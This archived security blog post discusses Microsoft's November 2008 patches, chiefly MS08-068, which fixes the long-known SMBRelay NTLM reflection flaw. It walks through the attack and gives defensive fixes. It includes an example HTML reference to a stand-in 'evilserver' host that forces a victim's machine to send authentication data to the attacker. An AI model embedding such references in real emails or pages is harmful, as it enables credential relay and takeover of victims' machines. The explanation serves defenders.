Archive for November, 2008

Reflections on the November 2008 Microsoft patch release

Two security bulletins released today. One Critical, one rated Important. I find the ‘Important’ bulletin far more interesting this month.

From what I can tell, it appears that MS08-068 (Important) is addressing a vulnerability that was first made public 7+ years ago (in 2001). Sir Dystic, from Cult of the Dead Cow, found a vulnerability in Microsoft Operating Systems that enabled attackers complete access to user’s computers. He wrote a utility called SMBRelay to demonstrate the flaw. Microsoft was aware of the issue but didn’t issue any security bulletins or patches to correct the behavior. Well, it looks like they’ve finally seen the light and have addressed this issue via the MS08-068 patch.

To highlight how this works, here’s an example: The attacker and the victim are on the same corporate network. The victim’s firewall either allows file and printer sharing services to function, and/or the firewall has been turned off.

The attacker sends the victim an html email (or convinces them to visit their website) where the html code includes a reference like: <file://evilserver/picturejpg>. When the victim machine goes to view this html, it attempts to display the ‘picture’ jpg. To do this, it needs to connect to the evilserver machine over NetBIOS ports. The evilserver machine asks the victim machine to authenticate to it, so it can then serve up the picture.jpg file. The victim machine performs NTLM challenge-response authentication process in order to connect to evilserver to get this picture file. Whether the authentication succeeds or fails, it’s already too late. The evil server now has challenge-response data that it can use to reply back to the victim’s machine – allowing the attacker to simply connect to the victim’s machine without providing any specific password. The attacker has the same credentials as the user had on their system and can read and write files, modify the registry, delete objects, access emails, etc.

I used to demonstrate this attack in classroom training events around the country. It was very eye opening for people to see a very easy to use exploit that could result in accessing anyone’s computer on their network. That this had been acknowledged by Microsoft in 2001 but never fixed was an equally eye-opening bit of news for the classroom participants.

This is a pretty scary attack that should keep IT managers up at night until it’s fully patched. “How do I know I haven’t already been hacked with this exploit?” “Who’s been accessing my computer without my password?” “Well, you don’t really know. Anyone with a computer on a typical corporate network and a copy of Sir Dystic’s SMBRelay exploit has probably already been on your computer and you’d never know.

To fix the issue, apply the patch. Or, enable SMBsigning on all your NetBIOS communication (something Microsoft recommended in 2001 when this issue was first raised.) Or, enable personal firewalls on all machines and disable the Server service. This is certainly another good excuse to block inbound and outbound NetBIOS access at your corporate firewalls if you aren’t already.

Regarding MS08-069, this is a Critical vulnerability in the Microsoft MSXML parser that ships both in the OS and in most Office products. Visit the wrong website or open a malicious document and you’re hacked. Nuff said. Apply the patch.

Comments (1) »